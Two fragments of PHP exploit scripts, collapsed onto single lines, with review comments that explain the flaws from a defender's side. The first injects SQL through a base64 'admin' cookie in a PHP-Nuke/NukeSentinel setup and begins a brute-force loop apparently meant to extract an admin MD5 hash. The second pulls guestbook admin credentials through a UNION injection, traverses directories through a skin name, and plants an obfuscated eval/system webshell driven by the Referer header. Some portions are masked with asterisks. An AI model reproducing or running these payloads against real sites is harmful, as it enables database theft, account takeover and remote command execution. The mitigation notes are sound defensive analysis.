# NOTE(review): This line is a fragment of a PHP proof-of-concept script whose
# original line breaks were lost in extraction. It starts inside a comment
# quoting a statement from the target code and ends inside two unclosed
# `for` loops, so neither the setup ($url, $xpl, $tid, $nbtst, $login) nor the
# loop bodies are visible here. Read as a single line, everything after the
# first `#` is a comment.
#
# What the visible steps show, read from the defender's side:
#   * A request to index.php carries a client-supplied `Client-IP` header. The
#     script's own comment says this results in a row in the
#     `_nsnst_tracked_ips` table. Presumably the target takes the tracked
#     address from that header (TODO confirm against the target source). A
#     client-controlled header is not a trustworthy source address unless a
#     known proxy sets it.
#   * The `admin` cookie is set to urlencode(base64_encode("' OR 1=1#" . ':1:')).
#     This looks like the target base64-decodes the cookie and places a
#     colon-separated field into an SQL string (verify). Base64 is an encoding,
#     not sanitisation; decoded values need bound parameters like any other
#     input.
#   * includes/nsbypass.php is then requested with increasing `tid` values from
#     $tid up to $nbtst. A response header that does not match "phpnuke.org" is
#     treated as success. Sequential `tid` requests combined with an `admin`
#     cookie that decodes to SQL metacharacters make a usable detection
#     signature.
#   * The status message interpolates {$prfix}, while the comment above it
#     says $prefix. This is likely a typo, but the definitions are outside
#     this view.
#   * The trailing loops run 32 positions and character codes 48..71. The
#     inline comments label them MD5 hash length and charset. Their bodies are
#     cut off here.
# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')"); # # We insert a row in $prefix."_nsnst_tracked_ips". # print "\nInserting a row in {$prfix}_nsnst_tracked_ips"; $xpl->addheader("Client-IP", "255.255.255.255"); $xpl->get($url . 'index.php'); # Trying to find a valid tid. # Needed for $tum > 0. # print "\nTrying to find a valid tid (max hits={$nbtst})"; $sql = "' OR 1=1#"; $xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:'))); for ($c = $tid; $c <= $nbtst; $c++) { $xpl->get($url . "includes/nsbypass.php?tid={$c}"); if (!preg_match("#phpnuke.org#", $xpl->getheader())) { $tid = $c; print "\nValid tid found: {$tid}\nHash: {$login} -> "; break; } if ($c == $nbtst) { exit("\n#1 Exploit failed"); } } # MD5 hash length [32] # for ($a = 1; $a <= 32; $a++) { # MD5 charset [a-f0-9] # for ($b = 48; $b <= 71; $b++) { # +nsbypass.php
// NOTE(review): This line is a fragment of a second PHP proof-of-concept
// script, collapsed onto one line. It starts inside a boxed header comment
// and stops before the script ends. The page has masked parts of it with
// runs of asterisks (inside the concat(...) expression and in the login POST
// body), so the code shown is not syntactically complete and is kept exactly
// as found.
//
// What the visible steps show, read from the defender's side:
//   * The quoted target query places $f_language directly inside quotes in
//     the WHERE clause. The request puts a %00 byte, a quote and a UNION
//     SELECT in the `lang` parameter. Presumably the same parameter also
//     serves as a file name, which the NUL byte would truncate (TODO confirm).
//     Mitigations: an allow-list of language names, rejection of NUL bytes,
//     and bound query parameters.
//   * The admin name and password are matched out of the rendered page
//     (div class d_title) and replayed to admin/index.php. The session id is
//     read from a `f_sid` value in the response header, so it travels in
//     URLs. That the stored password can be replayed as-is suggests it is
//     not hashed (verify).
//   * admin/skins.php receives `aj_skin` with `../` segments. The script's
//     inline comment quotes the target passing $_POST['aj_skin'] straight
//     into @mkdir() under templates/skins/. Mitigation: restrict the skin name
//     to a safe character set and check the resolved path stays inside the
//     skins directory.
//   * $scode is a chain of chr() calls. Decoded, it names a call that hands
//     the request's Referer header (after stripslashes) to system(). $data
//     places that chain inside an eval() in a PHP open tag within the
//     `alex_livre` form field, and `skin_edit` points at the traversed
//     directory. The skin editor therefore appears to write admin-supplied
//     text to a file the web server will execute (verify). Detection ideas:
//     new directories under languages/, template files containing a PHP open
//     tag or eval(chr( chains, and Referer headers that carry shell syntax.
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) { print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2]; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to get logged in"; $xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification"); if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter"); if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } $scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)"; $data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer"; print "\nstatus> Writing the malicious skin\n\$shell> ";